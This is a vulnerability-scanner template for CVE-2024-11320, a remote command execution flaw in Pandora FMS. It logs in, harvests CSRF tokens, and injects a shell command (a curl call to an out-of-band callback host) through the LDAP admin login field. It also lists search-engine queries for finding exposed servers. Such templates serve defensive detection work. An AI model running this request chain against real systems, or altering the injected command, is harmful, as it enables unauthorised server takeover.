id: CVE-2024-11320 info: name: Pandora v7.0NG.777.3 - Remote Code Execution author: DhiyaneshDK,Shubham Rooter,pdresearch,iamnoooob severity: critical description: | Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism.This issue affects Pandora FMS- from 700 through <=777.4 impact: | Authenticated attackers can execute arbitrary commands via command injection in the LDAP authentication mechanism, leading to complete system compromise. remediation: | Upgrade Pandora FMS to version 777.5 or later. reference: - https://github.com/mhaskar/CVE-2024-11320 - https://nvd.nist.gov/vuln/detail/CVE-2024-11320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-11320 cwe-id: CWE-77 epss-score: 0.92623 epss-percentile: 0.99758 cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* metadata: vendor: pandorafms product: pandora_fms shodan-query: - http.html:"pandora fms - installation wizard" - http.title:"pandora fms" fofa-query: - body="pandora fms - installation wizard" - title="pandora fms" google-query: intitle:"pandora fms" tags: cve,cve2024,oast,rce,pandora,fms,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) http: - raw: - | GET /index.php?login=1 HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: csrf_code group: 1 regex: - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>' internal: true - raw: - | POST /index.php?login=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}} matchers: - type: dsl dsl: - status_code == 302 - contains(set_cookie, 'PHPSESSID=') condition: and internal: true - raw: - | GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, 'Server health') condition: and internal: true - raw: - | GET /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: csrf_code2 group: 1 regex: - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>' internal: true matchers: - type: dsl dsl: - status_code == 200 - contains_all(body, 'Authentication method', 'LDAP') condition: and internal: true - raw: - | POST /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1 Host: {{Hostname}} Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup§ion=auth Content-Type: application/x-www-form-urlencoded update_config=1&csrf_code={{csrf_code2}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3bcurl%20xxxxzz.{{interactsh-url}}%20%23&ldap_admin_pass=&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local matchers: - type: dsl dsl: - status_code == 200 - contains(body,'Correctly updated the setup options') internal: true condition: and - raw: - | GET /index.php?login=1 HTTP/1.1 Host: {{Hostname}} disable-cookie: true matchers: - type: word part: interactsh_protocol words: - dns # digest: 4a0a00473045022078c18d3dd82946e90ea441328338b757bed7d0a0b945381eeec936a742cbcc5d022100f9ca48d05985889bc4afb80f8c3e5381cd82b4f4a8b9f605c4583f3d819648c5:922c64590222798bb761d5b6d8e72950